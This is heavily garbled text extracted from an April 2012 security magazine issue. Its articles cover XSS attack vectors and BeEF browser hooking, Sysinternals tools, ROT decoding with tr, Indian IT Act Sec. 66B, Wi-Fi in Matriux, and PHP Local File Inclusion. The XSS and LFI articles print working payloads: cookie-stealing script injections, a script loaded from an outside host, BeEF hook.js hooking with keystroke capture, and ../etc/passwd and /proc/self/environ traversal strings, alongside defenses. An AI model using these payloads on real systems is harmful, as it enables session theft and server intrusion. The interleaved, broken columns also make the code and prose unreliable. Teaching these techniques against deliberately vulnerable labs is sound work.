Apr 2012

----------------------- Page 1----------------------Issue 27 April 2012 | Page - 1
XSS The Burning issue

e on the victims
JavaScript
cod
browser.
The impact of
an XSS attack is only limited

in Web Application
cy of the attackers JavaScript
by the poten
code.
One of the largest portals was in news

nto the types of XSS :recently when their website was exploited
by targeting XSS vulnerability. The person
XSS Attacks
who
compromised
the website
has also
ed XSS Attacks
notified the portal with screenshots proving
ed XSS
successful attack. Information Security chief
called an urgent meeting to discuss the issue
Stored XSS are those where
with his entire team. He asked that we have
code is permanently stored on
got application security audit done form
vers, such as in a database, in a
third party before going live, we have also
, visitor log, comment field,
trained our developers with secure coding
m then retrieves the malicious
practices, then why this incident happened!!
the server when it requests the
They went to other third party vendor and
tion.
appointed them to audit the application.
Audit team has found that XSS can be
- Reflected XSS are those
possible
from
the
Custom
XSS
attack
cted code is reflected off the
A quick look i
Stored
Reflect
DOM Bas
Stored XSS the injected
the target ser
message forum
etc. The victi
script from
stored informa
Reflected XSS
where the inje
vector method.
ch as in an error message,
web server, su
search result
, or any other response that

In this paper, I will be explaining two major
or all of the input sent to the
aspects of Cross Site Scripting Attack:
of the request. Reflected XSS
includes some
server as part
are delivered
to victims via another route,

1. Tricky XSS
an e-mail message, or on some
2. Complete
control
rver. When a user is tricked
browser BeEF
over
ng
or
such as in
User s
other web se
into
on
malicious
link
clicki
submitting
specially crafted form, the

Cross Site scripting (XSS) is an attack in
injected code
travels to the vulnerable web
which an attacker exploits vulnerability in
server, which
reflects the attack back to the
application
code
and
runs
his
own
users browser. The browser then executes

on attack vectors but
the code because it came from a "trusted"
ng to discuss those in this
server.
are going to discuss is out of
There are more comm

we are not goi
article, what we
box attacks whic
h requires more patience

DOM based XSS - DOM Based XSS is an
XSS attack wherein the attack payload is
executed as a result of modifying the DOM
experience is saying that,
environment in the victims browser used
n our observation,
by the original client side script, so that the
w input gets stored or get
client side code runs in an unexpected
eb page. In some cases I
manner. That is, the page itself (the HTTP
hat developer uses a user
response that is) does not change, but the
some client side JavaScript
client side code
contained
in the page
they are getting trapped.
executes differently due to the malicious
and more beer

What my personal
XSS is more dependent o
observation of ho
reflected on the w
have observed t
input data in
functions. Here
What a develope
r will do, he will sanitize

modifications that have occurred
ING area (i.e. form), he
DOM environment.
care of JavaScript functions.
in
the
only the USER FAC

will not take
Lets
these possible
ways
by
So, all this is the story about the types of
XSS. Now let the real game begin.
cover
all
example.
Custom Attack Vec
tor I
XSS attack more patience, more
possibility of attack.
ered many a times that
Its been encount

user input valu
es are getting used in client

Regular XSS attack strings: ript
functions
at
clients
side
java
sc
machine. General
ly developers focus more
><script
he will use best encoding
>alert(document.cookie)</scri
on the GUI part,

technique to enco
de values which are on the

pt>
the time developer forgets
;alert(String.fromCharCode(8
in which input value are
8,83,83))//\ ;alert(String.fr
n text.
omCharCode(88,83,83))//";aler
t(String.fromCharCode(88,83,8
we can see the way XSS is
3))//\";alert(String.fromChar
oited in applications which
Code(88,83,83))//-nput
values
in javascript
></SCRIPT>"> ><SCRIPT>alert(S
Victim application uses the
tring.fromCharCode(88,83,83))
ubdirectory
name
in the
</SCRIPT>
function.
For
example,
<SCRIPT
te.com is the url of the
SRC=http://ha.ckers.org/xss.j
then
s></SCRIPT>
site.com/abc
and
<IMG
te.com/xyz/asd are the
SRC="javascript:alert( XSS );
es
of
this
application.
">
ion contains subdirectory
GUI, but most of

about the function
being used in plai
In below example
successfully expl
take
user
functions. This
application
javas cript
http://www.victimsi
application,
http://www.victim
http://www.victimsi
sub
directori
JavaScript Funct
names in a plain
text.
/tickets-booking /sear
ch form
+ &t= + (((new
Date()).getTime() -
began_loading) /
1000);alert(document
.cookie);//
+ &t= + (((new
Date()).getTime() -
began_loading) / 100
0)
Javascript function
will treat this line as
Victim
application
has
/ticketscontinuation
of
the function
line and
booking/search form directory. Observe in
execute
ne, then
it comes
above
screenshots
the
li
to
that
/ticketsalert(document.cooki
e); it will execute that

booking/search form is being used at two
command and // will m
ake rest of the line
places - one in javascript function and one
as a comment. Hence
XSS vulnerability gets
in one of the hidden field of the GUI page.
exploited easily in
this application. We have
Developer has encoded special characters in
tried
all
availa
ble attack vectors in this

hidden field, but we can observe that text is
application,
but
application
has smart
as it is in javascript function.
encoding
which encodes all the
/tickets-booking /search form
by this JAVASCRIPT
+ &t= + (((new
have exploited XSS
Date()).getTime() -
methods
special characters, but

FUNCTION, attackers
very easily.
began_loading) / 1000)
Custom Attack Vecto
r II
Above line is as it is in javascript function. If
xample of custom attack
I write http://www.victimsite.com/abc/xyz
victim site, there is one
in address bar then application responses
which has the value of
back with page not found error,but the
his value is being used by
javascript function
will have
value like
ction called OpenTicket.
below:
This is another e
vector.
hidden
In
the
variable
referer page link. T

one javascript fun
Legitimate value o
f the function line is as

per below:
OpenTicket( TaxTDR.a
5678u , 9999999999 ,
/abc/xyz + &t= + (((new

Date()).getTime() spx , qw1234
began_loading) / 1000)
attack@atta
cker.com , 55555 , d
/2012
15:19:13 , 1 , 1 , f
this javascript function. I have appended

rmTempasad ,
+ &t= + (((new
evil , 13/02
Now we will see a custom attack vector for
, , , ,SegmentI
becomes like following.

attack vector, javascript
D)
Date()).getTime() began_loading) /
1000);alert(document.cookie);//
in the URL. Now the javascript function
By appending this
function treats th
e line as a legitimate line

and completes the
function. Then function
executes the document.write function and

bute
then it comments rest of the part.
Style Attri
Its been o
bserved that STYLE attribute is

Our aim is achieved here, XSS exploited
some of the developers. They
ignored by
successfully.
the
miscellaneous
block
events
all
like
onclick, o
nmouseover etc. STYLE attribute

Onmouseover XSS
imitation of supporting only get
xss has l
execute in
IE, but that doesnt mean we can

One form is available on victim website.
ignore it.
This is a part of registration form to register
for some scheme on public facing page. Fill
one form on victim website which
the required information in the form, press
details of user. Developers have
submit and capture the request in the web
r level best to prevent XSS by all
proxy tool.
le methods, but totally ignored
There is
expects the
tried thei
the possib
STYLE attri
bute.
The form
is processed with the required
field and
captures the values in proxy tool.
Observe in
the below screenshot, there is an
appended ST
YLE attribute with the value of
XSS attack
vector in the input field.
Append the onmouseover
into the first name field.
attack
vector
XSS is expl
oited successfully at the page.
In response, application respond back with
error message that special characters are
not allowed. But when you click on the text
box of first name, you get surprised. Script
re
many
more
victim
websites
gets executed on the page.
on internet; its just a matter of
There
available
how expert
you are to catch the vulnerable

point. For
Reflected XSS, how your input
gets
lected
on
the
entire
html
ref
page
concerns a
lot. Now we have successfully

exploited
XSS in web applications, lets see
how an at
tacker can take full control of
victims brow
ser using BeEF.
The
wser
Exploitation
Bro
Framework
(BeEF) is
a powerful professional security

tool.
F
is
pioneering
techniques
BeE
that
provide th
e experienced penetration tester

with
tical
client side
prac
attack vectors.
Unlike other security frameworks, BeEF

tart the attacker machines. And
focuses
on
leveraging
browser
alize the BeEF on the machine.
vulnerabilities
to
assess
the
security
the screenshot for the BeEF login
posture of a target. BeEF hooks one or
more web browsers as beachheads for the
launching of directed command modules.
Each
browser
is likely
to be within a
different security context, and each context
may provide a set of unique attack vectors.
http://beefproject.com/
Disclaimer: In this entire example
section
I
have
http://demo.testfire.net as a victim
site. This website is handled by IBM,
and
which
contains
number
vulnerabilities by intention only.
BeEF
framework
code
is
Now, lets s
lets
initi
Below is
page.
used
available
http://code.google.com/p/beef/downloads/
list. Anyone can download and install BeEF,
into the BeEF framework, below
which requires web server, PHP and ruby
t look or we can say home page of
installation
as pre-requisites.
Backtrack
ized BeEF.
(BT) has inbuilt setup of BeEF in it. BT
users can use it without any installation. In
of
at
After login
is the firs
the initial
this article, I have used BT to demonstrate.

Lets start it by a simple XSS example. Below
in the search filed pass the simple
vector, <script>alert(XSS)</script>
XSS
Now the rea

l game is about to begin. At the
Victim side
, earlier we have seen the normal
XSS on de
mo site. Lets apply the BeEF
attack payl
oad on the site.
Now
entire browser is in attackers hand. He
can
check the system information of the
cre
ated information.
Simply apply this script code in the search
box of the application. IP address is live IP
address of a machine on which BeEF is
configured. Hook.js will hook a browser into
BeEF.
There are many other ways possible to force
victim user to click on this payload,
example by sending one image which has
malicious link behind it, or by click jacking
attack, or by email etc.
for
When Victim execute BeEF payload, he

wont see any changes on his side, but the at
the attacker side, he can see one ZOMBIE
created.
----------------------- Page 9-----------------------
Issue 27 April 2012 | Page - 9
Attacker can execute JAVASCRIPTS from

his
end
to
victims
browser.
screenshot attacker is sending the javascript
alert box request.
In
below
I
ave
opened
Facebook
in
Victims
brows
er.
BeEF
plugin has detected that Facebook is
initi
ated at the victims browser.
Alert box get populated at the victims end.
BeEF can also detect the social networking

site status on the browser. Detect Social
networks module will detect if the victims
browser
is
Facebook or Twitter.
authenticated
to
Gmail,
BeEF can also be useful to capture the

to prevent
XSS
by
applying
well
keystrokes of the victims browser. I have
techniques,
also
do
not
allow
open one test page at victims browser
of any HTML tag or attribute in
which has one textbox field. I have typed
input option (i.e. textbox, listbox,
secret password as the textbox value.
nd hidden variables. XSS attack
best
encoding
insertion
editable
textarea) a
may har
m a lot; it all depends on how bad

developm
ent
skills
of
the
application
develope
r are and how good attackers skills

are.
At the BeEF framework, event Logs will

have an entry that was typed by the user on
the victim browser secret password in one
textbox.
Ankit Ni
rmal
ankit.ni
rmal@indusface.com
Ankit
Nirmal
is
senior
information
secur
ity consultant at Indusface. Ankit

has
over
years
of
experience
in
infor
mation and application security. At

Indus
face, Ankit currently leads a team
of s
ecurity engineers and is conducting
expan
sive
research
in
the
automate
appli
cation
security
and
code
review
This was all about some tricky and advance
ss.
stuff of XSS. Sometimes one wonders what
if attackers hook cyber cafs or librarys or
publicly
available
computer
into
proce
their
BeEF!! All those who access these machines

will suffer a lot. One should try their level
Sysinternals Suite
TCP View is a subset of
TCP connections.
the NetStat progr
am which provides a more

informative and c
onveniently handled data.
On downloading
TCPView Tcpvcon and a
Sysinternals utilities
are
one
of
the
best
command-line
version
with
the
same
friends of administrator. Sysinternals was
functionality com
es along as a surprise gift.
original
created
back in 1996
by
Russinovich and Bryce Cogswell and was
bought by Microsoft in 2006. Since then the
company has continued to release new tools
and improve the existing ones.
The
Sysinternals
suite consists
following different categories:
Mark
of
the
File and Disk Utilities

Networking Utilities
Process Utilities
Security Utilities
System Information Utilities
Miscellaneous Utilities
Using TCPView
We will look into some interesting utilities
that can come to our rescue in a handy.
s all the active TCP and
TCPView enumerate
UDP endpoints, re
solving all IP addresses to

TCPView v3.05
their
name
versions.
To
domain
toggle
between the dis
plays of resolved names a

TCPView is a program from Windows that
toolbar button or
menu item can be used. By
shows a detail listings of all the TCP and
default, TCPView
updates every second, but
UDP endpoints on a system, including all
the local and remote addresses and state of
you can use the Options|Refresh Rate menu

symbol
support
for
each
item to change the rate.
ltaneous logging to a file,
integrated
operation, simu
and
e. It is a powerful utility
Color
Coding:
Endpoints
which
will make it an important
changes
much
mor
whose features
state from
one
update
to the next are
system troubleshooting and
highlighted
in yellow;
those
which
are
toolkit.
deleted
are
shown
in red, and
new
endpoints are shown in green.
of
Process
Monitor
utility in ones
malware hunting
Overview
Capabilities
One can close any established connections

which
are labeled
as a Established
by
nitor
includes
powerful
selecting
File|Close
Connections,
or by
and
filtering
capabilities,
right-clicking on a connection and choosing
Close
Connections
from
the
resulting
context menu.
ta
captured
for operation
Process
Mo
monitoring
including:
The
da
input a
nd output parameters is more
Using Tcpvcon
d.
detaile
The thre
ad stacks are captured for

Tcpvcon is similar to use as the built-in
peration making it easier to
Windows netstat utility.
y
the
root
cause
of
any
each o
identif
operati
on.
Usage: tcpvcon [-a] [-c] [-n] [process name
Capture o
f process details, including
or PID]
image p
ath, command line, user and
-a
Show all endpoints (default
ID
show established TCP connections).
nt properties columns are
is
to
session
The
eve
configu
rable and moveable
-c
Print output as CSV.
ers can be set for any data
The filt
field,
including fields which are not

-n
Don t resolve addresses.
red as columns
configu
Advanced
logging architecture scales
The TCPView is a very useful and a handy
to tens
of millions of captured events
tool which gives the details in one view to
and gig
abytes of log data
the Administrator.
A
cess
tree
tool
shows
pro
Process Monitor v3.0

nship
of
all
relatio
processes
referen
ced in a trace
Process Monitor is monitoring tool that
viewing
of process
image
shows
file
system,
Registry
and
tion
process/thread activity. It is a combination
logging of all operations is
of
the
features
of
two
important
e.
Sysinternals utilities, Filemon and Regmon.
It adds an extensive list of enhancements
including rich and non-destructive filtering,
comprehensive
event
properties
informa
Boot time
possibl
such
session IDs and user names, reliable process

information,
full
thread
stacks
Easy
with
The Sysinternals Troubleshooting Utilities

have been rolled up into a single Suite of
tools.
This
file
contains
troubleshooting tools and help files.

http://technet.microsoft.com/enus/sysinternals/bb842062
Author:
Amit Kumar
Amit is a System Engineer at Infosys.
the
individual
There are malwares present which analyze

whether any of the Sysinternal tools are
running and before attack they make sure to
close it or change its own behavior. These
types of malwares need to be analyzed
separately.
If used properly the Sysinternals now called
as WinInternals can be very useful and can
make you work easier if used properly
Decoding ROT using

the Echo and Tr
Commands in your
Linux Terminal
ho the word ProjectX=). Thus,
It would ec
the command
is used to write its arguments
to standard
output. Another command that
ROT which is known as the Caesar Cipher is
e using is the tr command which
a kind of cryptography wherein encoding is
characters.
I saw
in pastebin
done by moving the letters in the alphabet
implementations
in
different
to its next letter. There are 25 possible ROT
languages to decode ROT and
settings which covers the scope of letters At
of
them
are
using
the
TR
Z. Thus in ROT-1, A is equals to B and B is
so why not mixed it with the
equals to C and so are the next letters but Z
nd? Alright here it goes, for
would go back to A. And so the ROT-1
pkfduY is ROT-1 and so I can
cipher of ProjectXis QspkfduY. Thus, ROT
echo QspkfduY | tr b-za= rotation.
Z.
we will b
translates
different
programming
that
mos
application
echo comma
example Qs
decode it using
aB-ZA-A a-zA-
In this short write up we will be using the

echo and tr bash commands in your Linux
terminal to encode or decode letters using
ROT cipher. The echo command is a builtin command in Bash in C shells which
repeats the letters of words after it. For
example:
To decode the ROT-2 ProjectX which is

RtqlgevZ, I can just change b-za-aB-ZAA to c-za-bC-ZA-B.
Jay Turla
shipcodez@gma
il.com
This list should help you to decode ROT-3 to
ROT-25:
Jay Turla
is a programming student and
Infosec en
thusiast from the Philippines.
ROT-3 = tr d-za-cD-ZA-C a-zA-Z
He is one
of the bloggers of ROOTCON

ROT-4 = tr e-za-dE-ZA-D a-zA-Z
(Philippin
e Hackers Conference) and

ROT-5 = tr f-za-eF-ZA-E a-zA-Z
The
ProjectX
Blog.
ROT-6 = tr g-za-fG-ZA-F a-zA-Z
(http://ww
w.theprojectxblog.net/)
ROT-7 = tr h-za-gH-ZA-G a-zA-Z
ROT-8 = tr i-za-hI-ZA-H a-zA-Z
ROT-9 = tr -za-iJ-ZA-I a-zA-Z
ROT-10 = tr k-za-jK -ZA-J a-zA-Z

ROT-11 = tr l-za-kL-ZA-K a-zA-Z
ROT-12 = tr m-za-lM-ZA-L a-zA-Z
tr
tr
tr
tr
tr
tr
tr
tr
tr
tr
tr
tr
tr
n-za-mN-ZA-M
o-za-nO-ZA-N
p-za-oP-ZA-O
q-za-pQ-ZA-P
r-za-qR-ZA-Q
s-za-rS-ZA-R
t-za-sT-ZA-S
u-za-tU-ZA-T
v-za-uV-ZA-U
w-za-vW-ZA-V
x-za-wX-ZA-W
y-za-xY-ZA-X
z-za-yZ-ZA-Y
=
=
=
=
=
=
=
=
=
=
=
=
=
ROT-13
ROT-14
ROT-15
ROT-16
ROT-17
ROT-18
ROT-19
ROT-20
ROT-21
ROT-22
ROT-23
ROT-24
ROT-25
a-zA-Z
a-zA-Z
a-zA-Z
a-zA-Z
a-zA-Z
a-zA-Z
a-zA-Z
a-zA-Z
a-zA-Z
a-zA-Z
a-zA-Z
a-zA-Z
a-zA-Z
Take note of this technique, this guide

might be useful in CFP for other hacking
and information security conventions out
there.
retaining
or
receiving
stolen
computer
resource o
r a communication device.
Provisions of Sec. 66B

n reads as
The sectio
Whoever di
shonestly receives or retains any

stolen com
puter resource or communication
Punishment
for
dishonestly
owing or having reason to believe
receiving
stolen
computer
o be stolen computer resource or
resource
or
communication
ion device, shall be punished
device kn
the same t
communicat
with impri
sonment of either description for

device
a term w
hich may extend to three years or
As we have discussed in the earlier articles,
which may extend to rupees one
under the amended Information Technology
th both.
Act,
Section
66
has
been
completed
amended
to remove
the
definition
of
on applies
hacking. Amendments also introduced a
ly if the person knows or has a
series of new provisions under Section 66
reason to believe that the computer
covering
almost
all
major
cybercrime
resource
or
the
communication
incidents.
device is stolen.
with fine
lakh or wi
This secti
On
An
y stolen computer resource, or
In this article, we will have a look at the
to a person who dishonestly receives
provisions
of Sec.
66B
which
is about
or retains.
Any stolen communication device.

Here, term computer resource means
Computer
resource
as
Section 2 (1)(k) of the IT Act, 2000
Computer/computer,
network/data/computer
software.
defined
under
System/computer
data
base
Hence, this provision can also be applied in

the event of data theft.
Illustration 1.
Dinesh is working as an office boy in
Calsoft
systems
Pvt.
renowned IT company. Although his
Sagar Rahurkar.
work profile is low, he has a habit of
ltd.
or
contact@sagarrahurkar.com
playing gambling, because of which
he is always in need of money. One
Sagar
Rahurkar is a Law graduate, a

day, he noticed that, Priyanka, who
Certified Fraud Examiner (CFE) and a

is a company secretary of Calsoft has
certified Digital Evidence Analyst.
forgot her iPad in the office. He has
stolen
specializes
He
the
iPad
and
sold
in Cyber Laws, Fraud
it
to
Dheeraj, his friend who knew that

examination, and Intellectual Property
the
iPad
is
Law related issues. He has conducted
exclusive
training
stolen.
programs
for
Dheeraj
can
be
prosecuted
enforcement agencies like Police, Income
law
under
this
provision.
He is a regular contributor to various
2.
Dinesh is working as an office boy in
Info-Sec magazines, where he writes on
Calsoft
systems
Pvt.
IT Law related issues.
ltd.
renowned IT company. Dinesh was

Sagar
Rahurkar
can
be
contacted
infamous in the office as a greedy
at
contact@sagarrahurkar.com
person who is always behind money
and
noticed
lavish
lifestyle.
that,
Priyanka,
One
day,
who
he
is
company
secretary
forgot
her
Dinesh
stolen
of
Calsoft
laptop
the
has
in
laptop,
the
took
office.
it
home and given to his kids to play

with.
Dheeraj
can
be
prosecuted
under
this
provision.
St
art VM Ware and boot Matriux.
How to enable Wi-Fi
ter you login and obtain an IP, if
on
Matriux
running
you execute ifconfig -a, by default
Af
you will see only two interfaces i.e.,

inside VMware
eth0 and lo.
8:22 root@(non
e) /root# ifconfig a
Introduction
eth0
encap:Ethernet HWaddr
One of the most commonly asked question
aa:00:04:00:0a:04
on Matriux forums and IRC is how to enable
addr:192.168.116.130
inet
and work with Wi-Fi on a Matriux instance

t:192.168.116.255
running
inside
VMware
or
Link
Bcas
any
other
Mask
:255.255.255.0
virtualization software. This tutorial
6 addr: fe80::a800:4ff:fe00:a04/64
will
inet
Scop
e:Link
take you step by step on how to do that.
ROADCAST RUNNING MULTICAST MTU:1500
UP B
Metr
ic:1
For this tutorial, I am running VMware
kets:34 errors:0 dropped:0
Workstation on a Windows 7 Enterprise N
runs:0 frame:0
Edition which is my Host machine.
The
ackets:119 errors:0 dropped:0
RX pac
over
TX p
over
runs:0 carrier:0
Matriux is (obviously) my guest operating
coll
isions:0 txqueuelen:1000
system running "Krypton" v1.2. I am using a
D-Link
DWA-125
Wireless
N
Adapter for this tutorial.
150
USB
Procedure
There are so many methods and approaches
to
enable
Wi-Fi
inside
VMware
Virtualization
environment.
One
of
preferred approaches is explained below:
/
the
Note: Do not connect the Wireless

Adapter now.
Start Windows 7 (or your Host OS).
collisions:0 txqueuelen:1000
RX bytes:4731 (4.6 KiB) TX
bytes:11021
(10.7 KiB)
Interrupt:19 Base address:0x2000
lo
Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436
Metric:1
RX packets:52 errors:0 dropped:0
overruns:0 frame:0
TX packets:52 errors:0 dropped:0
Now
Connect
your
USB
overruns:0 carrier:0
Adapter
to your
PC
/
Wi-Fi
Laptop.

bytes:6688
(6.5 KiB)
If you
get
a
Installation
error
Driver
Software
or
information
window (as shown below), click on

the Close button to proceed.
Figure 2
Al
so, if you move the mouse over the
VM Status Bar USB icons, you can
see the USB WiFi Device listed there
(as shown below):
Figure 1
Now the USB Wi-Fi device is
Figure 3
available for VM.
You can verify this by switching to
k (or right-click) on the USB Wifi
VM and clicking on the menu VM ->
Icon on the VM and click on
Removable Devices.
"Connect (Disconnect from Host)" as
You can see the USB Wi-Fi Device
own below:
listed there as shown below:
Clic
sh
Figur
e 4
The following Message Window

overruns:0 frame:0
should appear. Click OK to proceed.

bytes:20639 (20.1 KiB)
Interrupt:19 Base address:0x2000
lo
Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0
Figure 5
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING
If you look at the VM Status bar, you
MTU:16436 Metric:1
can see that the USB WiFi Icon is
overruns:0 frame:0
now active and highlighted as shown
below:
RX bytes:6688 (6.5 KiB)
TX bytes:6688 (6.5 KiB)
wlan0
Link encap:Ethernet HWaddr

f0:7d:68:62:b9:ab
BROADCAST MULTICAST
MTU:1500 Metric:1
Figure 6
overruns:0 frame:0
Now your USB WiFi adapter is ready
for your Matriux WM and you can
verify the same using the ifconfig -a
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
command. The output is displayed

below:
C
onclusion:
8:52 root@(none) /root# ifconfig
-a
T
he rest I leave it to your WiFi zeal. Now

y
ou can do all your WiFi experiments with
eth0
Link encap:Ethernet HWaddr
aa:00:04:00:0a:04
atriux from within your Virtual
M
e
nvironment.
inet addr:192.168.116.130
Bcast:192.168.116.255
J
oin us for more discussion on Matriux and
Mask:255.255.255.0
i-Fi topics at http://forum.matriux.com/
inet6 addr: fe80::a800:4ff:fe00:a04/64

r http://is-ra.org/forum/.
Scope:Link
appy Learning
o
H
UP BROADCAST RUNNING MULTICAST
MTU:1500 Metric:1
Team Matriux
http://matriux.com
Local File Inclusion

oard/ .$GET_[ pag
include( b
e ];
}
What is Local File Inclusion?
?>
Local File Inclusion is a method in PHP for
such as include() are not
including Local files from the Local web
its wrong use can cause
server itself.
sue.
In itself functions
This becomes vulnerability when the pages

the include function tries
to be included from web servers are not
file from
the
board
sanitized
properly
and
to exploit
this
this code the developer is
vulnerability attacker can send modified
the variable
of page
for
http request to the server using a web
s periods and slashes (../
browser.
oving one directory up)
In the above script
vulnerable
but
serious security is
to
includes
subdirectory. In
not
sanitizing
characters such a
which is used for m
and also doesn t
checks if the file is a web

For example
if a developer
is using a
file which
can allow the
variable from URL (i.e. GET variable) for
de malicious file from the
calling specific
file on the server
for
stem resulting into critical
inclusion
for
example
the
URL
is
osure
or arbitrary code
/board/index.php?page=contactus
the
sample php code for this may be:
server
system
attacker to inclu
web server filesy
information
discl
execution.
For eg. if attack
er modifies the page url to:

<?php
index.php?page=../../.
if($_GET[ page ]!= )
www.site.com/board/
./etc/passwd
The above URL wi

ll cause PHP to include
{
/etc/passwd file
----------------------- Page 22----------------------Iss
ue 27 April 2012 | Page - 22
This modified URL will disclose all the list

t variables we can
of users on the server.
In the above environmen

control some of the en
vironment variables
and
such
as
www.site.com/board/index.php?page=../../.
0
./proc/self/environ
0) which we can
alter
them,
HTTP_USER_AGENT=Mozilla/5.
(Windows NT
6.1; rv:8.
tamper and put php scr

ipt to gain shell
The above URL will cause php to include
environment
variables which
looks as
access.
follows:
Following are some of
the PHP functions
used for file inclusion:
PATH=/usr/local/bin:/usr/bin:/bi
nDOCUMENT_ROOT=/hsphere/local/ho
me/c242949/site.comHTTP_ACCEPT=t
ext/html,application/xhtml+xml,a
pplication/xml;q=0.9,*/*;q=0.8HT
TP_ACCEPT_CHARSET=ISO-8859-
include();
require();
include_once();
1,utfrequire_once();
8;q=0.7,*;q=0.7HTTP_ACCEPT_ENCOD
ING=gzip,
eir own code for
deflateHTTP_ACCEPT_LANGUAGE=enfollows:
us,en;q=0.5HTTP_CONNECTION=keepaliveHTTP_COOKIE=PHPSESSID=1662i
Some developers may use th

filtering these attacks as
<?php
mbqqot4jq099sij0rhfr3HTTP_HOST=s
if(isset($_GET[ page ]))
{
include( board/ .str_repla
/", ,($_GET[ page ])). .p
ite.comHTTP_USER_AGENT=Mozilla/5
.0 (Windows NT 6.1; rv:8.0)
Gecko/20100101
Firefox/8.0REDIRECT_QUERY_STRING
ce("..
=filename=/proc/./self/./environ
hp );
REDIRECT_STATUS=200REDIRECT_URL=
}
/runner.phpREMOTE_ADDR=116.202.1
64.155REMOTE_PORT=49376SCRIPT_FI
LENAME=/hsphere/shared/php5/bin/
phpSERVER_ADDR=98.131.116.1SERVE
ems to be a very
R_ADMIN=webmaster@site.comSERVER
php filters can be
_NAME=www.site.comSERVER_PORT=80
aking the following
SERVER_SOFTWARE=ApacheGATEWAY_IN
TERFACE=CGI/1.1SERVER_PROTOCOL=H
//....
TTP/1.1REQUEST_METHOD=GETQUERY_S
TRING=filename=/proc/./self/./en
?>
Beware!! The above code se
a good idea but such
bypassed
easily
by
request:
"index.php?page=....//....
//etc/passwd%00"
vironREQUEST_URI=/runner.php?fil
ename=/proc/./self/./environSCRI
PT_NAME=/php5bin/phpPATH_INFO=/r
unner.phpPATH_TRANSLATED=/hspher
e/local/home/c242949/site.com/ru
nner.php
----------------------- Page 23----------------------I
ssue 27 April 2012 | Page - 23
Securing
Local
product":
Vulnerabilities:
File
Inclusion
case "
include("product
.php");
1. Always try to use if else statement in
following way. For example:
default
<?php
hp");
if (isset($_GET[ page ]))
{
include("index.p
if($_GET[ page ]=="contact")

{
hp");
include("contact.php");
}
elseif($_GET[ page ]=="produc
}
else
{
include("index.p
}
?>
2. In the below code:
t")
{
<?php
if($_GET[ page ]!=
include("product.php");
}
{
include( board/
.urlencode(
else
$GET_[ page ]. .php
{
}
include("index.php");
}
?>
);
It will encode
the
attackers
}
../../etc/
request
"index.php?page=../
passwd%00"
result
else
in
and
the
following
error:
{
Warning:include(pag
e/..%2F..%
include("index.php");
2F..%2F..%2F..%2Fet
c%2Fpasswd
}
%00.php)
[functio
n.include]:
?>
failed to open s
tream: No
such file or direct
ory
Or similarly you can use switch case:
3. Use realpath() func
tion in the code:
<?php
<?php
if(isset($_GET[ page ]))
{
include( board/ .re
alpath($_GET[ page ]
switch($_GET[ page ])
{
. .php );
case "contact":
?>
include("contact.php");
4
returns
on
/../
The
Real
path
function
canonicalized
absolute
pathname
success. The resulting path will have no
symbolic
link,
/./
or
components thus defending the attack
successfully.
4.
A good way for restricting the inclusion

of
/proc/self/environ
is
Apache server doesnt have access to
enviroment variables. We can change
the apache s shell in /etc/passwd to
to
see
that
/sbin/nologin in following way :

Vikram Pawar
pawarvikram666@gmail.com
apache:x:26:26:Apache:/var/ww
w:/sbin/nologin
Vikram Pawar is a hacking and security
enthusiast.
Vikram
This restricts apache server to access
pursuing
Bachelors
is
currently
Degree
in
environmental variables.
Computer
from
Science
G.H.
Raisoni
f
engineering and technology (Pune).
and
Engineering
institute

Apr 2012

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Apr 2012

Uploaded by

Copyright:

Available Formats

----------------------- Page 1----------------------Issue 27 April 2012 | Page - 1

----------------------- Page 2----------------------Issue 27 April 2012 | Page - 2

----------------------- Page 3----------------------Issue 27 April 2012 | Page - 3

XSS The Burning issue

an XSS attack is only limited

One of the largest portals was in news

, or any other response that

to victims via another route,

specially crafted form, the

----------------------- Page 4----------------------Issue 27 April 2012 | Page - 4

users browser. The browser then executes

There are more comm

h requires more patience

and more beer

r will do, he will sanitize

only the USER FAC

Its been encount

es are getting used in client

on the GUI part,

de values which are on the

GUI, but most of

----------------------- Page 5----------------------Issue 27 April 2012 | Page - 5

e); it will execute that

ble attack vectors in this

special characters, but

referer page link. T

f the function line is as

/abc/xyz + &t= + (((new

this javascript function. I have appended

becomes like following.

e line as a legitimate line

executes the document.write function and

bserved that STYLE attribute is

nmouseover etc. STYLE attribute

IE, but that doesnt mean we can

you are to catch the vulnerable

lot. Now we have successfully

a powerful professional security

e experienced penetration tester

----------------------- Page 7----------------------Issue 27 April 2012 | Page - 7

Unlike other security frameworks, BeEF

this article, I have used BT to demonstrate.

Now the rea

----------------------- Page 8----------------------Issue 27 April 2012 | Page - 8

When Victim execute BeEF payload, he

----------------------- Page 9-----------------------

Issue 27 April 2012 | Page - 9

Attacker can execute JAVASCRIPTS from

BeEF can also detect the social networking

----------------------- Page 10----------------------Issue 27 April 2012 | Page - 10

BeEF can also be useful to capture the

m a lot; it all depends on how bad

r are and how good attackers skills

At the BeEF framework, event Logs will

ity consultant at Indusface. Ankit

mation and application security. At

BeEF!! All those who access these machines

am which provides a more

File and Disk Utilities

solving all IP addresses to

plays of resolved names a

you can use the Options|Refresh Rate menu

One can close any established connections